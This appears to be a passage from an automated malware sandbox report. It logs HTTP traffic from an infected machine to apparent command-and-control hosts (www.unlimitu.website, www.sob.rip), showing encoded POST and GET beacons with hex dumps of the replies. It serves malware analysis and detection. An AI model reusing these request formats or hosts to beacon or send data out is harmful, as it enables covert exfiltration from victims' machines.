                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        80192.168.11.2049795209.74.79.4080
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:59:23.157952070 CET1289OUTPOST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 37 5a 62 57 44 4c 33 4d 71 62 44 75 66 4a 36 6e 76 51 46 6f 39 47 32 6c 44 4c 43 34 34 7a 46 43 77 67 64 63 4f 64 53 31 76 52 33 72 36 73 30 7a 79 38 6e 63 48 50 72 79 79 7a 78 79 58 59 43 62 4d 76 4f 53 4a 68 4c 6a 6c 71 6b 45 43 37 6f 45 71 5a 53 65 59 39 58 4a 6b 39 2f 70 4a 66 33 70 72 67 36 65 62 4d 46 30 5a 37 35 61 45 32 39 4b 66 64 76 50 65 77 7a 52 6e 46 46 45 63 68 57 4f 62 31 4d 59 4a 44 6e 77 70 33 52 46 57 55 4b 51 30 33 68 4d 77 51 30 76 57 65 6f 62 59 6e 74 70 42 69 6e 62 52 72 49 69 68 78 32 59 37 70 38 65 68 36 45 78 57 30 77 49 6f 49 4f 51 56 30 4c 6d 59 5a 7a 48 52 50 74 50 49 49 59 2b 52 6a 7a 7a 69 51 59 73 41 57 57 30 4a 41 4d 62 4f 46 65 46 4f 79 4e 4b 43 41 4d 59 48 4a 6f 73 50 62 61 53 77 65 55 77 74 71 58 57 30 38 62 2f 4a 6e 39 77 2b 35 38 7a 59 71 50 63 47 4d 77 4e 31 36 51 4c 36 79 77 6b 50 64 66 36 6e 31 6d 65 70 69 35 74 45 62 43 72 65 75 47 73 6a 67 53 43 49 39 6e 35 39 65 32 51 49 67 6f 74 73 6d 5a 6b 36 45 51 35 4d 6e 78 53 61 57 65 5a 38 4b 4b 44 73 56 57 [TRUNCATED]
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDufJ6nvQFo9G2lDLC44zFCwgdcOdS1vR3r6s0zy8ncHPryyzxyXYCbMvOSJhLjlqkEC7oEqZSeY9XJk9/pJf3prg6ebMF0Z75aE29KfdvPewzRnFFEchWOb1MYJDnwp3RFWUKQ03hMwQ0vWeobYntpBinbRrIihx2Y7p8eh6ExW0wIoIOQV0LmYZzHRPtPIIY+RjzziQYsAWW0JAMbOFeFOyNKCAMYHJosPbaSweUwtqXW08b/Jn9w+58zYqPcGMwN16QL6ywkPdf6n1mepi5tEbCreuGsjgSCI9n59e2QIgotsmZk6EQ5MnxSaWeZ8KKDsVW6saZHA6SJuayN/YEj/DwsFsFe425bjNWu0julgC7GFirGsTRBn1sHn2wRP4CWWTFffAf7XYcQfpTmGN/hJG8akG4wXdm/Dd+EjoSLu89aKeL4+qkTA5nR1zmx9hjBnFQi3s4LodnUaoI1pLrDaRPwlwORc/ldz82IrPU6peu1KHd8GrnpP6OKFwNyrTpc62Li1wB6faDWdfGJEgfiskbc29Fna3cSPgC5jq9bOMwlEbUR15zFXzrBuUqfwmB8nA8Zla3A+jSot2eWtz9QrMmcMaJjuMP4P9UAt50R59xrx7BJp5AcRvJQG6PwK+J9pITcOKVq+8bwsL86da5/6JE4ovV/asClqNOlnveiEQUUKPpvWl0xpwzoGg+49+/LqFHWcyN62atdu5FC3CcB+18iUi3HryPpD2k4kh9ZGavHAYLJlmSeyl3X0x2fEr5pDKc8FFyMKyNrCdoBRw7DhUW4DOmU4j0pRQynEtdp6JZdoRTt
                                                                                        Dec 12, 2024 21:59:23.158000946 CET1289OUTData Raw: 45 4f 59 64 41 53 30 32 45 72 75 35 64 55 42 4d 4f 47 47 43 38 74 51 68 33 56 50 51 58 62 6f 43 4e 74 73 30 31 46 79 63 64 30 39 51 69 31 4b 36 75 34 5a 67 62 7a 47 38 77 72 6c 69 4c 36 45 44 61 31 69 41 66 39 44 54 30 48 72 44 56 49 37 68 35 77
                                                                                        Data Ascii: EOYdAS02Eru5dUBMOGGC8tQh3VPQXboCNts01Fycd09Qi1K6u4ZgbzG8wrliL6EDa1iAf9DT0HrDVI7h5wYJ2T6b/0Wg1+Sh5TRy/qyytagyVXk3nwAkEFBuCpS23oEcX5qyI2lakIfUo1CL/SqpLRAVliIX2LoAdV9ruN3vz0hAkonnjvNptda5OdEhS4cvC9GRHY6F4di177U4S4rpV49FHO3Par3wI1qIW7bkqUTF7ZuoQAy
                                                                                        Dec 12, 2024 21:59:23.158051014 CET5247OUTData Raw: 5a 4d 59 74 69 4b 7a 7a 2f 36 4f 54 54 2b 31 41 52 42 4a 4b 6e 6b 59 56 38 78 46 4c 6f 78 49 6d 73 6e 37 6a 41 4f 6f 4e 38 41 37 36 59 6c 4f 54 41 6b 33 39 4d 4f 63 57 65 49 73 50 78 36 75 76 44 49 71 79 36 44 61 55 73 56 50 52 63 52 42 73 64 2b
                                                                                        Data Ascii: ZMYtiKzz/6OTT+1ARBJKnkYV8xFLoxImsn7jAOoN8A76YlOTAk39MOcWeIsPx6uvDIqy6DaUsVPRcRBsd+GyY8HjuGHQLd7FmGXAOSKvEF2eT+KQS8oH9wB/ay/RHM7BilIFOaVicoiz/URCUKEakMkUP+hwWzlamaWWbM59j6e9Fcm9V2xkv4Et13G7FERJrF7FgFJGa1FU7WQeSHyErV1iqnULHlLxVHGQW8OY5Kah1v9Atcx
                                                                                        Dec 12, 2024 21:59:23.342456102 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:59:23 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        81192.168.11.2049796209.74.79.4080
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:59:25.857727051 CET386OUTGET /b4eq/?Sb=2bz2A+/Foq3BfYH3nkBAyBiQIN6vyGxA4CsyDuG2uzWi6t8+qfWmEOSu1g9JXJzNDc3HOGTjteURa686/52bGvnFkZWUI+XcrzebZPERH7tGcGhGffP7RzY=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:26.037225008 CET548INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:59:25 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        82192.168.11.2049797199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:59:31.172265053 CET629OUTPOST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 62 78 5a 57 68 2f 46 48 56 76 4a 76 61 38 53 74 38 5a 68 79 43 6c 54 61 41 6d 72 39 53 4b 6a 76 71 75 4a 43 32 45 65 74 42 61 5a 36 68 32 2b 52 67 51 41 43 56 2f 62 74 43 44 42 42 79 45 4a 72 46 54 52 73 43 48 79 35 43 32 46 4a 4a 59 52 6b 5a 5a 67 52 6e 48 68 76 32 43 43 7a 75 4d 36 4d 51 51 56 51 35 42 4a 44 41 67 49 73 79 4a 52 36 49 77 35 36 4b 71 68 72 38 4e 66 57 4a 30 49 6c 66 76 39 67 71 4f 38 72 65 65 48 42 33 55 37 49 43 75 6f 4c 66 42 56 5a 55 52 63 51 32 44 75 6b 75 6f 33 75 35 50 4d 55 59 55 38 33 41 58 31 71 33 55 65 31 35 46 77 6f 55 35 62 32 41 45 35 66 6b 41 3d 3d
                                                                                        Data Ascii: Sb=bxZWh/FHVvJva8St8ZhyClTaAmr9SKjvquJC2EetBaZ6h2+RgQACV/btCDBByEJrFTRsCHy5C2FJJYRkZZgRnHhv2CCzuM6MQQVQ5BJDAgIsyJR6Iw56Kqhr8NfWJ0Ilfv9gqO8reeHB3U7ICuoLfBVZURcQ2Dukuo3u5PMUYU83AX1q3Ue15FwoU5b2AE5fkA==
                                                                                        Dec 12, 2024 21:59:31.317600012 CET1200INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:31 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 9a9c8482-1274-4c24-abcf-17fed1b9896f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=9a9c8482-1274-4c24-abcf-17fed1b9896f; expires=Thu, 12 Dec 2024 21:14:31 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 73 4a 67 31 54 45 31 41 79 51 58 6f 55 30 4b 45 64 50 62 56 37 46 53 51 33 49 37 62 72 38 58 58 53 37 68 71 52 44 74 42 50 46 69 57 42 4f 68 32 55 71 7a 39 30 65 59 71 76 34 33 46 7a 2f 64 4e 36 48 30 41 67 74 32 41 34 45 6e 47 37 69 6b 52 2f 4f 4f 48 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                                                        Dec 12, 2024 21:59:31.317675114 CET587INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                                        Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWE5Yzg0ODItMTI3NC00YzI0LWFiY2YtMTdmZWQxYj


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        83192.168.11.2049798199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:59:33.830043077 CET649OUTPOST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 62 78 5a 57 68 2f 46 48 56 76 4a 76 62 63 69 74 7a 62 4a 79 48 46 54 5a 46 6d 72 39 64 71 6a 72 71 75 31 43 32 46 71 39 42 49 39 36 76 33 4f 52 68 53 34 43 57 2f 62 74 49 6a 42 45 32 45 4a 61 46 54 64 61 43 43 53 35 43 31 35 4a 4a 59 42 6b 5a 71 34 65 6f 33 68 74 37 69 43 78 7a 63 36 4d 51 51 56 51 35 42 4e 74 41 67 51 73 79 35 68 36 4a 53 42 39 44 4b 68 73 2f 4e 66 57 4e 30 49 70 66 76 39 65 71 4d 59 46 65 64 2f 42 33 55 72 49 44 37 55 45 47 52 56 62 51 52 64 2b 2b 6d 53 76 69 70 58 63 32 39 51 63 5a 31 45 59 4d 68 34 77 71 6d 71 52 36 57 73 61 51 4a 69 65 43 47 34 45 35 46 49 2b 33 47 45 56 6b 66 62 35 56 6f 79 43 6a 49 2f 48 38 44 30 3d
                                                                                        Data Ascii: Sb=bxZWh/FHVvJvbcitzbJyHFTZFmr9dqjrqu1C2Fq9BI96v3ORhS4CW/btIjBE2EJaFTdaCCS5C15JJYBkZq4eo3ht7iCxzc6MQQVQ5BNtAgQsy5h6JSB9DKhs/NfWN0Ipfv9eqMYFed/B3UrID7UEGRVbQRd++mSvipXc29QcZ1EYMh4wqmqR6WsaQJieCG4E5FI+3GEVkfb5VoyCjI/H8D0=
                                                                                        Dec 12, 2024 21:59:33.961736917 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:33 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 4b1d4339-042d-41a7-a302-0700284f170c
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=4b1d4339-042d-41a7-a302-0700284f170c; expires=Thu, 12 Dec 2024 21:14:33 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 73 4a 67 31 54 45 31 41 79 51 58 6f 55 30 4b 45 64 50 62 56 37 46 53 51 33 49 37 62 72 38 58 58 53 37 68 71 52 44 74 42 50 46 69 57 42 4f 68 32 55 71 7a 39 30 65 59 71 76 34 33 46 7a 2f 64 4e 36 48 30 41 67 74 32 41 34 45 6e 47 37 69 6b 52 2f 4f 4f 48 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:59:33.961747885 CET498INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGIxZDQzMzktMDQyZC00MWE3LWEzMDItMDcwMDI4NGYxNzBjIiwicGFnZV90aW1lIjoxNzM0MDM3MTczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        84192.168.11.2049799199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:59:36.470969915 CET1289OUTPOST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 62 78 5a 57 68 2f 46 48 56 76 4a 76 62 63 69 74 7a 62 4a 79 48 46 54 5a 46 6d 72 39 64 71 6a 72 71 75 31 43 32 46 71 39 42 49 31 36 76 42 61 52 67 31 55 43 58 2f 62 74 4c 6a 42 46 32 45 4a 44 46 54 45 54 43 43 58 4d 43 77 31 4a 49 37 35 6b 66 62 34 65 2f 6e 68 74 79 43 43 30 75 4d 36 5a 51 51 6b 34 35 42 64 74 41 67 51 73 79 2f 46 36 4a 41 35 39 46 4b 68 72 38 4e 65 43 4a 30 49 4e 66 75 59 6c 71 4d 4d 37 65 4e 66 42 33 31 62 49 42 4a 38 45 4f 52 56 6a 63 78 64 51 2b 6d 58 33 69 70 4c 6d 32 38 6c 4a 5a 32 30 59 50 32 4a 32 79 6c 47 32 73 30 63 53 63 5a 71 7a 4f 48 38 67 77 33 45 65 36 56 56 30 73 34 72 4d 4c 35 2f 4e 37 4a 54 38 68 58 59 54 4e 4f 4f 2f 32 42 48 38 45 65 75 64 65 69 30 5a 4c 64 30 59 7a 4a 32 38 58 71 4b 67 65 58 31 2f 6d 6c 32 50 31 76 37 46 77 63 4e 76 49 4e 42 69 31 58 37 61 57 4d 43 48 65 70 42 47 6c 77 2f 4b 67 4b 6f 51 38 79 69 62 77 44 7a 46 74 67 52 6c 4f 34 38 39 48 47 4d 58 57 4d 4e 5a 50 2f 56 72 37 33 32 6d 51 38 69 58 76 55 6b 36 53 71 67 4a 75 43 6b 54 6b 72 6d [TRUNCATED]
